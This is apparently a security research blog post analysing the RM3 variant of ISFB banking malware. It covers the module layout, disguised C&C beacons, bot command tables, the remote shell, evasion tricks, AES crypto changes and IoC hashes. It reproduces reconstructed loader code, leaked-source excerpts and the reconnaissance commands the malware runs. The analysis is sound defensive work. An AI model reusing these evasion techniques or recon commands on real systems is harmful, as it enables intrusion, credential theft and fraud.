  • bl.dll
  • explorer.dll
  • rt.dll
  • netwrk.dll

These modules are linked together to recreate a modded client32.bin/client64.bin (modded from the client.bin seen in ISFB v2). This new architecture is much more complicated to debug or disassemble. In the end, however, we can split this malware into 4 main branches:

  • A modded client32.bin/client64.bin
  • A browser module designed to setup hooks and an SSL proxy (used for POST HTTP/HTTPS interception)
  • A remote shell (probably designed for initial assessments before starting lateral attacks)
  • A fraud arsenal toolkit (hidden VNC, SOCKs proxy, etc…)
RM3 Architecture

RM3 Loader –
Major ISFB update? Or just a refactored code?

The loader is a minimalist plugin that contains only the required functions for doing three main tasks:

  • Contacting a loader C&C (which is called host), downloading critical RM3 modules and storing them into the registry (bl.dll, explorer.dll, rt.dll, netwrk.dll)
  • Setting up persistence†
  • Rebooting everything and making sure it has removed itself†.
An overview of the second stage loader

These functions are summarised in the following schematic.‡

† In the 3009XX build above, a TA can decide to setup the loader as persistent itself, or remove the payload.

‡ Of course, the loader has more details than could be mentioned here, but the schematic shows the main concepts for a basic understanding.

RM3 Network beacons – Hiding the beast behind simple URIs

C&C beacon requests have been adjusted from the standard ISFB v2 ones, by simplifying the process with just two default URI. These URIs are dynamic fields that can be configured from the loader and client config. This is something that older strains are starting to follow since build 250172.

When it switches to the controller side, RM3 saves HTTPS POST requests performed by the users. These are then used to create fake but legitimate looking paths.

Changing RM3 URI path dynamically

This ingenious trick makes RM3 really hard to catch behind the telemetry generated by the bot. To make short, whenever the user is browsing websites performing those specific requests, the malware is mimicking them by replacing the domain with the controller one.

https://<controler_domain>.tld/index.html                <- default
https://<controler_domain>.tld/search/wp-content/app     <- timer cycle #1
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/admin/credentials/home    <- timer cycle #2
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/operating/static/template/index.php  <- timer cycle #3
https://<controler_domain>.tld/operating/static/template/index.php
https://<controler_domain>.tld/operating/static/template/index.php
https://<controler_domain>.tld/operating/static/template/index.php

If that wasn’t enough, the usual base64 beacons are now hidden as a data form and send by means of POST requests. When decrypted, these requests reveal this typical network communication.

random=rdm&type=1&soft=3&version=300960&user=17fe7d78280730e52b545792f07d61cb&group=21031&id=00000024&arc=0&crc=44c9058a&size=2&uptime=219&sysid=15ddce20c9691c1ff5103a921e59d7a1&os=10.0_0_0_x64 

The fields can be explained in as follows:

Field Meaning
randomA mandatory randomised value
typeData format
softNetwork communication method
versionBuild of the RM3 banking malware
userUser seed
groupCampaign ID
idRM3 Data type
arcModule with specific architecture (0 =  i386 – 1= 86_x64)
sizeStolen data size
uptimeBot uptime
sysidMachine seed
osWindows version

Soft – A curious ISFB Field

Value Stage C&C Network Communication Response Format
(< Build 300960)
Response Format
(Build 300960)
3Host (Loader)WinAPIBase64(RSA + Serpent)Base64(RSA + AES)
2Host (Loader)COMBase64(RSA + Serpent)Base64(RSA + AES)
1ControllerWinAPI/COMRSA + SerpentRSA + AES

ID – A field being updated RM3

Thanks to the source code leak, identifying the data type is not that complicated and can be determined from the field “id”

Бот отправляет на сервер файлы следующего типа и формата (тип данных задаётся параметром type в POST-запросе):
SEND_ID_UNKNOWN	0	- неизвестно, используется только для тестирования	
SEND_ID_FORM	1	- данные HTML-форм. ASCII-заголовок + форма бинарном виде, как есть
SEND_ID_FILE	2	- любой файл, так шлются найденные по маске файлы
SEND_ID_AUTH	3	- данные IE Basic Authentication, ASCII-заголовок + бинарные данные
SEND_ID_CERTS	4	- сертификаты. Файлы PFX упакованые в CAB или ZIP.
SEND_ID_COOKIES	5	- куки и SOL-файлы. Шлются со структурой каталогов. Упакованы в CAB или ZIP
SEND_ID_SYSINFO	6	- информация о системе. UTF8(16)-файл, упакованый в CAB или ZIP
SEND_ID_SCRSHOT	7	- скриншот. GIF-файл.
SEND_ID_LOG	8	- внутренний лог бота. TXT-файл.
SEND_ID_FTP	9	- инфа с грабера FTP. TXT-файл.
SEND_ID_IM	10	- инфа с грабера IM. TXT-файл.
SEND_ID_KEYLOG	11	- лог клавиатуры. TXT-файл.
SEND_ID_PAGE_REP 12	- нотификация о полной подмене страницы TXT-файл.
SEND_ID_GRAB	13	- сграбленый фрагмент контента. ASCII заголовок + контент, как он есть

Over time, they have created more fields:

New CommandIDDescription
SEND_ID_CMD19Results from the CMD_RUN command
SEND_ID_???20
SEND_ID_CRASH21Crash dump
SEND_ID_HTTP22Send HTTP Logs
SEND_ID_ACC23Send credentials
SEND_ID_ANTIVIRUS24Send Antivirus info

Module list

Analysis indicates that any RM3 instance would have to include at least the following modules:

CRCModule NamePE FormatStageDescription
MZ1st stage RM3 loader
0xc535d8bfloader.dllPX2nd stage RM3 loader
MZRM3 Startup module hidden in the shellcode
0x8576b0d0bl.dllPXHostRM3 Background Loader
0x224c6c42explorer.dllPXHostRM3 Mastermind
0xd6306e08rt.dllPXHostRM3 Runtime DLL – RM3 WinAPI/COM Module
0x45a0fcd0netwrk.dllPXHostRM3 Network API
0xe6954637browser.dllPXControllerBrowser Grabber/HTTPS Interception
0x5f92dac2iexplore.dllPXControllerInternet explorer Hooking module
0x309d98fffirefox.dllPXControllerFirefox Hooking module
0x309d98ffmicrosoftedgecp.dllPXControllerMicrosoft Edge Hooking module (old one)
0x9eff4536chrome.dllPXControllerGoogle chrome Hooking module
0x7b41e687msedge.dllPXControllerMicrosoft Edge Hooking module (Chromium one)
0x27ed1635keylog.dllPXControllerKeylogging module
0x6bb59728mail.dllPXControllerMail Grabber module
0x1c4f452avnc.dllPXControllerVNC module
0x970a7584sqlite.dllPXControllerSQLITE Library required for some module
0xfe9c154bftp.dllPXControllerFTP module
0xd9839650socks.dllPXControllerSocks module
0x1f8fde6bcmdshell.dllPXControllerPersistent remote shell module

Additionally, more configuration files ( .ini ) are used to store all the critical information implemented in RM3. Four different files are currently known:

CRC Name
0x8fb1dde1loader.ini
0x68c8691cexplorer.ini
0xd722afcbclient.ini†
0x68c8691cvnc.ini

† CLIENT.INI is never intended to be seen in an RM3 binary, as it is intended to be received by the loader C&C (aka “the host”, based on its field name on configs). This is completely different from older ISFB strains, where the client.ini is stored in the client32.bin/client64.bin. So it means, if the loader c&c is offline, there is no option to get this crucial file

Moving this file is a clever move by the RM3 malware developers and the TAs using it as they have reduced the risk of having researcher bots in their ecosystem.

RM3 dependency madness

With client32.bin (from the more standard ISFB v2 form) technically not present itself but instead implemented as an accumulation of modules injected into a process, RM3 is drastically different from its predecessors. It has totally changed its micro-ecosystem by forcing all of its modules to interact with each other (except bl.dll) and as shown below.

All interactions between RM3 modules

These changes also slow down any in-depth analysis, as they make it way harder to analyse as a standalone module.

External calls from other RM3 modules (8576b0d0 and e695437)

RM3 Module 101

Thanks to the startup module launched by start.ps1 in the registry, a hidden shell worker is plugged into explorer.exe (not the explorer.dll module) that initialises a hooking instance for specific WinAPI/COM calls. This allows the banking malware to inject all its components into every child process coming from that Windows process. This strategy permits RM3 to have total control of all user interactions.

(*) PoV = Point of View

Looking at DllMain, the code hasn’t changed that much in the years since the ISFB leak.

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  BOOL Ret = TRUE;
  WINERROR Status = NO_ERROR;

  Ret = 1;
  if ( ul_reason_for_call ) {
    if ( ul_reason_for_call == 1 && _InterlockedIncrement(&g_AttachCount) == 1 ) {
      Status = ModuleStartup(hModule, lpReserved); // <- Main call 
      if ( Status ) {
        SetLastError(Status);
        Ret = 0;
      }
    }
  }
  else if ( !_InterlockedExchangeAdd(&g_AttachCount, 0xFFFFFFFF) ) {
    ModuleCleanup();
  }
  return Ret;
}

It is only when we get to the ModuleStartup call that things start to become interesting. This code has been refactored and adjusted to the RM3 philosophy:

static WINERROR ModuleStartup(HMODULE hModule) {
    WINERROR Status; 
    RM3_Struct RM3;

    // Need mandatory RM3 Struct Variable, that contains everything
    // By calling an export function from BL.DLL
	RM3 = bl!GetRM3Struct();  

    // Decrypting the .bss section
    // CsDecryptSection is the supposed name based on ISFB leak
	Status = bl!CsDecryptSection(hModule, 0);
  
    if ( (gs_Cookie ^ RM3->dCrc32ExeName) == PROCESSNAMEHASH )
    	Status = Startup() 
	
    return(Status);
}

This adjustment is pretty similar in all modules and can be summarised as three main steps:

  • Requesting from bl.dll a critical global structure (called RM3_struct for the purpose of this article) which has the minimal requirements for running the injected code smoothly. The structure itself changes based on which module it is. For example, bl.dll mostly uses it for recreating values that seem to be part of the PEB (hypothesis); explorer.dll uses this structure for storing timeout values and browsers.dll uses it for RM3 injects configurations.
  • Decrypting the .bss section.
  • Entering into the checking routine by using an ingenious mechanism:
    • The filename of the child process is converted into a JamCRC32 hash and compared with the one stored in the startup function. If it matches, the module starts its worker routine, otherwise it quits.

These are a just a few particular cases, but the philosophy of the RM3 Module startup is well represented here. It is a simple and clever move for monitoring user interactions, because it has control over everything coming from explorer.exe.

bl.dll – The backbone of RM3

The background loader is almost nothing and everything at the same time. It’s the root of the whole RM3 infrastructure when it’s fully installed and configured by the initial loader. Its focus is mainly to initialise RM3_Struct and permits and provides a fundamental RM3 API to all other modules:

Ordinal    | Goal 
==========================================
856b0d0_1  | bl!GetBuild
856b0d0_2  | bl!GetRM3Struct
856b0d0_3  | bl!WaitForSingleObject
856b0d0_4  | bl!GenerateRNG
856b0d0_5  | bl!GenerateGUIDName
856b0d0_6  | bl!XorshiftStar
856b0d0_7  | bl!GenerateFieldName
856b0d0_8  | bl!GenerateCRC32Checksum
856b0d0_9  | bl!WaitForMultipleObjects
856b0d0_10 | bl!HeapAlloc
856b0d0_11 | bl!HeapFree
856b0d0_12 | bl!HeapReAlloc
856b0d0_13 | bl!???
856b0d0_14 | bl!Aplib
856b0d0_15 | bl!ReadSubKey 
856b0d0_16 | bl!WriteSubKey 
856b0d0_17 | bl!CreateProcessA
856b0d0_18 | bl!CreateProcessW
856b0d0_19 | bl!GetRM3MainSubkey
856b0d0_20 | bl!LoadModule
856b0d0_21 | bl!???
856b0d0_22 | bl!OpenProcess 
856b0d0_23 | bl!InjectDLL
856b0d0_24 | bl!ReturnInstructionPointer
856b0d0_25 | bl!GetPRNGValue
856b0d0_26 | bl!CheckRSA
856b0d0_27 | bl!Serpent
856b0d0_28 | bl!SearchConfigFile
856b0d0_29 | bl!???
856b0d0_30 | bl!ResolveFunction01
856b0d0_31 | bl!GetFunctionByIndex
856b0d0_32 | bl!HookFunction
856b0d0_33 | bl!???
856b0d0_34 | bl!ResolveFunction02
856b0d0_35 | bl!???
856b0d0_36 | bl!GetExplorerPID
856b0d0_37 | bl!PsSupSetWow64Redirection
856b0d0_40 | bl!MainRWFile
856b0d0_42 | bl!PipeSendCommand
856b0d0_43 | bl!PipeMainRWFile
856b0d0_44 | bl!WriteFile 
856b0d0_45 | bl!ReadFile
856b0d0_50 | bl!RebootBlModule
856b0d0_51 | bl!LdrFindEntryForAddress
856b0d0_52 | bl!???
856b0d0_55 | bl!SetEAXToZero
856b0d0_56 | bl!LdrRegisterDllNotification
856b0d0_57 | bl!LdrUnegisterDllNotification
856b0d0_59 | bl!FillGuidName
856b0d0_60 | bl!GenerateRandomSubkeyName
856b0d0_61 | bl!InjectDLLToSpecificPID
856b0d0_62 | bl!???
856b0d0_63 | bl!???
856b0d0_65 | bl!???
856b0d0_70 | bl!ReturnOne             
856b0d0_71 | bl!AppAlloc
856b0d0_72 | bl!AppFree
856b0d0_73 | bl!MemAlloc
856b0d0_74 | bl!MemFree
856b0d0_75 | bl!CsDecryptSection  (Decrypt bss, real name from isfb leak source code)
856b0d0_76 | bl!CreateThread
856b0d0_78 | bl!GrabDataFromRegistry
856b0d0_79 | bl!Purge
856b0d0_80 | bl!RSA

explorer.dll – the RM3 mastermind

Explorer.dll could be regarded as the opposite of the background loader. It is designed to manage all interactions of this banking malware, at any level:

  • Checking timeout timers that could lead to drastic changes in RM3 operations
  • Allowing and executing all tasks that RM3 is able to perform
  • Starting fundamental grabbing features
  • Download and update modules and configs
  • Launch modules
  • Modifying RM3 URIs dynamically
An overview of the RM3 explorer.dll module

In the task manager worker, the workaround looks like the following:

RM3 task manager implemented in explorer.dll

Interestingly, the RM3 developers abuse their own hash system (JAMCRC32) by shuffling hashes into very large amounts of conditions. By doing this, they create an ecosystem that is seemingly unique to each build. Because of this, it feels a major update has been performed on an RM3 module although technically it is just another anti-disassembly trick for greatly slowing down any in-depth analysis. On the other hand, this task manager is a gold mine for understanding how all the interactions between bots and the C&C are performed and how to filter them into multiple categories.

General command

General commands

CRC Command Description
0xdf43cd90CRASHGenerate and send a crash report
0x274323e2RESTARTRestart RM3
0xce54bcf5REBOOTReboot system

Recording

CRC Command Description
0x746ce763VIDEOStart desktop recording of the victim machine
0x8de92b0dSETVIDEOVIDEO pivot condition
0x54a7c26cSET_VIDEOPreparing desktop recording

Updates

CRC Command Description
0xb82d4140UPDATE_ALLForcing update for all module
0x4f278846LOAD_UPDATELoad & Execute and updated PX module

Tasks

CRC Command Description
0xaaa425c4USETASKKEYUse task.bin pubkey for decrypting upcoming tasks

Timeout settings

CRC Command Description
0x955879a6SENDTIMEOUTTimeout timer for receiving commands
0xd7a003c9CONFIGTIMEOUTTimeout timer for receiving inject config updates
0x7d30ee46INITIMEOUTTimeout timer for receiving INI config update
0x11271c7fIDLEPERIODTimeout timer for bot inactivity
0x584e5925HOSTSHIFTTIMEOUTTimeout timer for switching C&C domain list
0x9dd1ccafSTANDBYTIMEOUTTimeout timer for switching primary C&C’s to Stand by ones
0x9957591RUNCHECKTIMEOUTTimeout timer for checking & run RM3 autorun
0x31277bd5TASKTIMEOUTTimeout timer for receiving a task request

Clearing

CRC Command Description
0xe3289ecbCLEARCACHECLR_CACHE pivot condition
0xb9781fc7CLR_CACHEClear all browser cache
0xa23fff87CLR_LOGSClear all RM3 logs currently stored
0x213e71beDEL_CONFIGRemove requested RM3 inject config

HTTP

CRC Command Description
0x754c3c76LOGHTTPIntercept & log POST HTTP communication
0x6c451cb6REMOVECSPRemove CSP headers from HTTP
0x97da04deMAXPOSTLENGTHClear all RM3 logs currently stored

Process execution

CRC Command Description
0x73d425ffNEWPROCESSInitialising RM3 routine

Backup

CRC Command Description
0x5e822676STANDBYCase condition if primary servers are not responding for X minutes

Data gathering

CRC Command Description
0x864b1e44GET_CREDSCollect credentials
0xdf794b64GET_FILESCollect files (grabber module)
0x2a77637aGET_SYSINFOCollect system information data

Main tasks

CRC Command Description
0x3889242LOAD_CONFIGDownload and Load a requested config with specific arguments
0xdf794b64GET_FILESDownload a DLL from a specific URL and load it into explorer.exe
0xae30e778LOAD_EXEDownload an executable from a specific URL and load it
0xb204e7e0LOAD_INIDownload and load an INI file from a specific URL
0xea0f4d48LOAD_CMDLoad and Execute Shell module
0x6d1ef2c6LOAD_FTPLoad and Execute FTP module with specific arguments
0x336845f8LOAD_KEYLOGLoad and Execute keylog module with specific arguments
0xdb269b16LOAD_MODULELoad and Execute RM3 PX Module with specific arguments
0x1e84cd23LOAD_SOCKSLoad and Execute socks module with specific arguments
0x45abeab3LOAD_VNCLoad and Execute VNC module with specific arguments

Shell command

CRC Command Description
0xb88d3fdfRUN_CMDExecute specific command and send the output to the C&C

URI setup

CRC Command Description
0x9c3c1432SET_URIChange the URI path of the request

File storage

CRC Command Description
0xd8829500STORE_GRABSave grabber content into temporary file
0x250de123STORE_KEYLOGSave keylog content into temporary file
0x863ecf42STORE_MAILSave stolen mail credentials into temporary file
0x9b587bc4STORE_HTTPLOGSave stolen http interceptions into temporary file
0x36e4e464STORE_ACCSave stolen credentials into temporary file

Timeout system

With its timeout values stored into its rm3_struct, explorer.dll is able to manage every possible worker task launched and monitor them. Then, whenever one of the timers reaches the specified value, it can modify the behaviour of the malware (in most cases, avoiding unnecessary requests that could create noise and so increase the chances of detection).

COM Objects being inspected for possible timeout

Backup controllers

In the same way, explorer.dll also provides additional controllers which are called ‘stand by’ domains. The idea behind this is that, when principal controller C&Cs don’t respond, a module can automatically switch to this preset list. Those new domains are stored in explorer.ini.

{
    "STANDBY": "standbydns1.tld","standbydns2.tld"  
    "STANDBYTIMEOUT": "60"                   // Timeout in minutes
}

In the example above, if the primary domain C&Cs did not respond after one hour, the request would automatically switch to the standby C&Cs.

Desktop recording and RM3 – An ingenious way to check bots

Rarely mentioned in the wild but actively used by TAs, RM3 is also able to record bot interactions. The video setup is stored in the client.ini file, which the bot receives from the controller domain.

"SETVIDEO": [
        "30,",     // 30 seconds
        "8,",      // 8 Level quality (min:1 - max:10)
        "notipda"  // Process name list    
],

Behind “SETVIDEO”, only 3 values are required to setup video recording:

RM3 AVI recording setup

After being initialised, the task waits its turn to be launched. It can be triggered to work in multiple ways:

  • Detecting the use of specific keywords in a Windows process
  • Using RM3’s increased debugging telemetry to detect if something is crashing, either in the banking malware itself or in a deployed injects (although the ability to detect crashes in an inject is only hypothetical and has not been observed)
  • Recording user interactions with a bank account; the ability to record video is a relatively new but killer move on the part of the malware developers allowing them to check legitimate bots and get injects

The ability to record video depends only on “@VIDEO=” being cached by the browser module. It is not primarily seen at first glance when examining the config, but likely inside external injects parts.

@ ISFB Code leak
Вкладка Video - запись видео с экрана

Opcode = "VIDEO"
Url - задает шаблон URL страницы, для которой необходмо сделать запись видео с экрана
Target - (опционально) задает ключевое слово, при наличии которого в коде страницы будет сделана запись
Var - задаёт длительность записи в секундах
RM3 browser webinject module detecting if it needs to launch a recording session (or any other particular task).

RM3 and its remote shell module – a trump card for ransomware gangs

Banking malware having its own remote shell module changes the potential impact of infecting a corporate network drastically. This shell is completely custom to the malware and is specially designed. It is also significantly less detectable than other tools currently seen for starting lateral movement attacks due to its rarity. The combination of potentially much greater impact and lower detectability make this piece of code a trump card, particularly as they now look to migrate to a ransomware model.

Called cmdshell, this module isn’t exclusive to RM3 but has in fact, been part of ISFB since at least build v2.15. It has likely been of interest for TA groups in fields less focused on fraud since then. The inclusion of a remote shell obviously greatly increases the flexibility this malware family provides to its operators; but also, of course, makes it harder to ascertain the exact purpose of any one infection, or the motivation of its operators.

Cmdshell module being launched by the RM3 Task Manager

After being executed by the task command “LOAD_CMD”, the injected module installs a persistent remote shell which a TA can use to perform any kind of command they want.

RM3 cmdshell module creating the remote shell

As noted above, the inclusion of a shell gives great flexibility, but can certainly facilitate the work of at least two types of TA:

  • Fraudsters (if the VNC/SOCKS module isn’t working well, perhaps)
  • Malicious Red teams affiliated with ransomware gangs

It’s worth noting that this remote shell should not be confused with the RUN_CMD command. The RUN_CMD is used to instruct a bot to execute a simple command with the output saved and sent to the Controllers. It is also present as a simple condition:

RUN_CMD inside the RM3 Task Manager

Then following a standard I/O interaction:

Executing task in cmd console and saving results into an archive

But both RM3’s remote shell and the RUN_CMD can be an entry point for pushing other specialised tools like Cobalt Strike, Mimikatz or just simple PowerShell scripts. With this kind of flexibility, the main limitation on the impact of this malware is any given TA’s level of skill and their imagination.

Task.key – a new weapon in RM3’s encryption paranoia

Implemented sometime around Q2 2020, RM3 decided to add an additional layer of protection in its network communications by updating the RSA public key used to encrypt communications between bot and controller domains.

They designed a pivot condition (USETASKKEY) that decides which RSA.KEY and TASK.KEY will be used for decrypting the content from the C&C depending of the command/content received. We believed this choice has been developed for breaking researcher for emulating RM3 traffic.

Extra condition with USETASKKEY to avoid using the wrong RSA pubkey

RM3 – A banking malware designed to debug itself

As we’ve already noted, RM3 represents a significant step change from previous versions of ISFB. These changes extend from major architecture changes down to detailed functional changes and so can be expected to have involved considerable development and probably testing effort, as well. Whether or not the malware developers found the troubleshooting for the RM3 variant more difficult than previously, they also took the opportunity to include a troubleshooting feature. If RM3 experiences any issues, it is designed to dump the relevant process and send a report to the C&C. It’s expected that this would then be reported to the malware developers and so may explain why we now see new builds appearing in the wild rather faster than we have previously.

The task is initialised at the beginning of the explorer module startup with a simple workaround:

  • Address of the MiniDumpWritDump function from dbghelp.dll is stored
  • The path of the temporary dump file is stored in C://tmp/rm3.dmp
  • All these values are stored into a designed function and saved into the RM3 master struct
Crash dump being initialized and stored into the RM3 global structure

With everything now configured, RM3 is ready for two possible scenarios:

  • Voluntarily crashing itself with the command ‘CRASH’
  • Something goes wrong and so a specific classic error code triggers the function
RM3 executing the crash dump routine

Stolen Data – The (old) gold mine

Gathering interesting bots is a skill that most banking malware TAs have decent experience with after years of fraud. And nowadays, with the ransomware market exploding, this expertise probably also permits them to affiliate more easily with ransom crews (or even to have exclusivity in some cases).

In general, ISFB (v2 and v3) is a perfect playground as it can be used as a loader with more advanced telemetry than classic info-stealers. For example, Vidar, Taurus or Raccoon Stealer can’t compete at this level. This is because the way they are designed to work as a one-shot process (and be removed from the machine immediately afterwards) makes them much less competitive than the more advanced and flexible ISFB. Of course, in any given situation, this does not necessarily mean they are less important than banking malware. And we should keep in mind the fact that the Revil gang bought the source code for the Kpot stealer and it is likely this was so they could develop their own loader/stealer.

RM3 can be split into three main parts in terms of the grabber:

  • Files/folders
  • Browser credential harvesting
  • Mail
An overview of standard stealing feature developed by RM3

It’s worth noting that the mail module is an underrated feature that can provide a huge amount of information to a TA:

  • Many users store nearly everything in their email (including passwords and sensitive documents)
  • Mails can be stolen and resold to spammers for crafting legitimate mails with malicious attachments/links

Stealing/intercepting HTTP and HTTPS communication

RM3 implements an SSL Proxy and so is really effective at intercepting POST requests performed by the user. All of them are stored and sent every X minutes to the controllers.

RM3 browser module initializing the SSL proxy interception
RM3 SSL Proxy running on MsEdge

Whenever the user visits a website, part of the inject config will automatically replace strings or variables in the code (‘base’) with the new content (‘new_var’); this often includes a URL path from an inject C&C.

As if that wasn’t complicated enough, most of them are geofencedand it could be possible they manually allow the bot to get them (especially with the elite one). Indeed, this is another trick for avoiding analysts and researchers to get and report those scripts  that cost millions to financial companies.

A typical inject entry in config.bin

A parser then modifies the variable ‘@ID@ and ‘@GROUP@’ to the correct values as stored in RM3_Struct and other structures relevant to the browsers.dll module.

Browser inject module parsing config.bin and replacing with respective botid and groupid

System information gathering

Gathering system information is simple with RM3:

  • Manually (using a specific RUN_CMD command)
  • Requesting info from a bot with GET_SYSINFO

Indeed, GET_SYSINFO is known and regularly used by ISFB actors (both active strains)

systeminfo.exe
driverquery.exe
net view
nslookup 127.0.0.1
whoami /all
net localgroup administrators
net group "domain computers" /domain

TAs in general are spending a lot of time (or are literally paying people) to inspect bots for the stolen data they have gathered. In this regard, bots can be split into one of the following groups:

  • Home bots (personal accounts)
  • Researcher bots
  • Corporate bots (compromised host from a company)

Over the past 6 months, ISFB v2 has been seen to be extremely active in term of updates. One purpose of these updates has been to help TAs filter their bots from the loader side directly and more easily. This filtering is not a new thing at all, but it is probably of more interest (and could have a greater impact) for malicious operations these days. 

Microsoft Edge (Chromium) joining the targeted browser list

One critical aspect of any banking malware is the ability to hook into a browser so as to inject fakes and replacers in financial institution websites.

At the same time as the Task.key implementation, RM3 decided to implement a new browser in its targeted list: “MsEdge”. This was not random, but was a development choice driven by the sheer number of corporate computers migrating from Internet Explorer to Edge.

RM3 MsEdge startup module

This means that 5 browsers are currently targeted:

  • Internet Explorer
  • Microsoft Edge (Original)
  • Microsoft Edge (Chromium)
  • Mozilla Firefox
  • Google Chrome

Currently, RM3 doesn’t seem to interact with Opera. Given Opera’s low user share and almost non-existent corporate presence, it is not expected that the development of a new module/feature for Opera would have an ROI that was sufficiently attractive to the TAs and RM3 developers. Any development and debugging would be time consuming and could delay useful updates to existing modules already producing a reliable return.

RM3 and its homemade forked SQLITE module

A lot of this blogpost has been dedicated to discussing the innovative design and features in RM3. But perhaps the best example of the attention to detail displayed in the design and development of this malware is the custom SQLITE3 module that is included with RM3. Presumably driven by the need to extract credentials data from browsers (and related tasks), they have forked the original SQLite3 source code and refactored it to work in RM3.

Using SQLite is not a new thing, of course, as it was already noted in the ISFB leak.

Interestingly, the RM3 build is based on the original 3.8.6 build and has all the features and functions of the original version.

Because the background loader (bl.dll) is the only module within RM3 technically capable of performing allocation operations, they have simply integrated “free”, “malloc”, and “realloc” API calls with this backbone module.

What’s new with Build 300960?

Goodbye Serpent, Hello AES!

Around mid-march, RM3 pushed a major update by replacing the Serpent encryption with the good old AES 128 CBC. All locations where Serpent encryption was used, have been totally reworked so as to work with AES.

AES 128 CBC implementation in RM3

RM3 C&C response also reviewed

Before build 300960, RM3 treated data received from controllers as described below. Information was split into two encrypted parts (a header and a body) which are treated differently:

  1. The encrypted head was decrypted with the public RSA key extracted from modules, to extract a Serpent key
  2. This Serpent key was then used to decrypt the encrypted data in the body (this is a different key from client.ini and loader.ini).

This was the setup before build 300960:

Now, in the recently released 300960 build, with Serpent removed and AES implemented instead, the structure of the encrypted header has changed as indicated below:

The decrypted body data produced by this process is not in an entirely standard format. In fact, it’s compressed with the APlib library. But removing the first 0x14 bytes (or sometimes 0x4 bytes) and decompressing it, ensures that the final block is ready for analysis.

  • If it’s a DLL, it will be recognised with the PX format
  • If it’s web injects, it’s an archive that contains .sig files (that is, MAIN.SIG†)
  • If it’s tasks or config updates, these are in a classic raw ISFB config format

† SIG can probably be taken to mean ‘signature’

Changes in .ini files

Two fields have been added in the latest campaigns. Interestingly, these are not new RM3 features but old ones that have been present for quite some time.

{
    "SENDFGKEY": "0",    // Send Foreground Key
    "SUBDOMAINS": "0",   
}

Appendix

IoCs – Campaign

00cd7319a42bbabd0c81a7e9817d2d5071738d5ac36b98b8ff9d7383c3d7e1ba - DE
a7007821b1acbf36ca18cb2ec7d36f388953fe8985589f170be5117548a55c57 - Italy
5ee51dfd1eb41cb6ce8451424540c817dbd804f103229f3ae1b645b320cbb4e8 - Australia/NZ 1
c7552fe5ed044011aa09aebd5769b2b9f3df0faa8adaab42ef3bfff35f5190aa - Australia/NZ 2
261c6f7b7e9d8fc808a4a9db587294202872b2a816b2b98516551949165486c8 - UK 1
2e0b219c5ac3285a08e126f11c07ea3ac60bc96d16d37c2dc24dd8f68c492a74 - UK 2
6818b6b32cb91754fd625e9416e1bc83caac1927148daaa3edaed51a9d04e864 - Worldwide ?

86b670d81a26ea394f7c0edebdc93e8f9bd6ce6e0a8d650e32a0fe36c93f0dee - GoziAT/ISFB RM2

IoCs – Modules

b15c3b93f8de40b745eb1c1df5dcdee3371ba08a1a124c7f20897f87f23bcd55  loader.exe (Build 300932)
ce4fc5dcab919ea40e7915646a3ce345a39a3f81c33758f1ba9c1eae577a5c35  loader.dll (Build 300932)

ba0e9cb3bf25516e2c1f0288e988bd7bd538d275373d36cee28c34dafa7bbd1f  explorer.dll (Build 300932)
accb76e6190358760044d4708e214e546f87b1e644f7e411ba1a67900bcd32a1  bl.dll (Build 300932)
f90ed3d7c437673c3cfa3db8e6fbb3370584914def2c0c2ce1f11f90f199fb4f  ntwrk.dll (Build 300932)
38c9aff9736eae6db5b0d9456ad13d1632b134d654c037fba43086b5816acd58  rt.dll (Build 300932)

2c7cdcf0f9c2930096a561ac6f9c353388a06c339f27f70696d0006687acad5b  browser.dll (Build 300932)
34517a7c78dd66326d0d8fbb2d1524592bbbedb8ed6b595281f7bb3d6a39bc0a  chrome.dll (Build 300932)
59670730341477b0a254ddbfc10df6f1fcd3471a08c0d8ec20e1aa0c560ddee4  firefox.dll (Build 300932)
d927f8793f537b94c6d2299f86fe36e3f751c94edca5cd3ddcdbd65d9143b2b6  iexplorer.dll (Build 300932)
199caec535d640c400d3c6b35806c74912b832ff78cb31fd90fe4712ed194b09  microsoftedgecp.dll (Build 300932)
13635b2582a11e658ab0b959611590005b81178365c12062e77274db1d0b4f0c  msedge.dll (Build 300932)

65a1923e037bce4816ac2654c242921f3e3592e972495945849f155ca69c05e5  loader.dll (Build 300960)

d1f5ef94e14488bf909057e4a0d081ff18dd0ac86f53c42f53b12ea25cdcfe76  cmdshell.dll (Build 300869)
820faca1f9e6e291240e97e5768030e1574b60862d5fce7f6ba519aaa3dbe880  vnc.dll (Build 300869)

Shellcode – startup module – bss decrypted

Windows Security
NTDLL.DLL
RtlExitUserProcess
KERNEL32.DLL
bl.dll - bss decrypted
Microsoft Windows
KERNEL32.DLL
ADVAPI32.DLL
NTDLL.DLL
KERNELBASE
USER32
LdrUnregisterDllNotification
ResolveDelayLoadsFromDll
Software
Wow64EnableWow64FsRedirection
\REGISTRY\USER\%s\%s\
{%08X-%04X-%04X-%04X-%08X%04X}
SetThreadInformation
GetWindowThreadProcessId
%08X-%04X-%04X-%04X-%08X%04X
RtlExitUserThread
S-%u-%u
-%u
Local\
\\.\pipe\
%05u
LdrRegisterDllNotification
NtClose
ZwProtectVirtualMemory
LdrGetProcedureAddress
WaitNamedPipeW
CallNamedPipeW
LdrLoadDll
NtCreateUserProcess
.dll
%08x
GetShellWindow
\KnownDlls\ntdll.dll
%systemroot%\system32\c_1252.NLS
\??\
\\?\

explorer.dll – bss decrypted

indows Security
.jpeg
Main
.gif
.bmp
%APPDATA%\Microsoft\
tasklist.exe /SVC
\Microsoft\Windows\
cmd /C "%s" >> %S0
systeminfo.exe
driverquery.exe
net view
nslookup 127.0.0.1
whoami /all
net localgroup administrators
net group "domain computers" /domain
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
cmd /U /C "type %S0 > %S & del %S0"
echo -------- %u
KERNELBASE
.exe
RegGetValueW
0x%S
.DLL
DllRegisterServer
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Serialize
0x%X,%c%c
Startupdelayinmsec
ICGetInfo
SOFTWARE\Classes\Chrome
DelegateExecute
\\?\
%userprofile%\appdata\local\google\chrome\user data\default\cache
\Software\Microsoft\Windows\CurrentVersion\Run
http\shell\open\command
ICSendMessage
%08x
 | "%s" | %u
msvfw32
ICOpen
ICClose
ICInfo
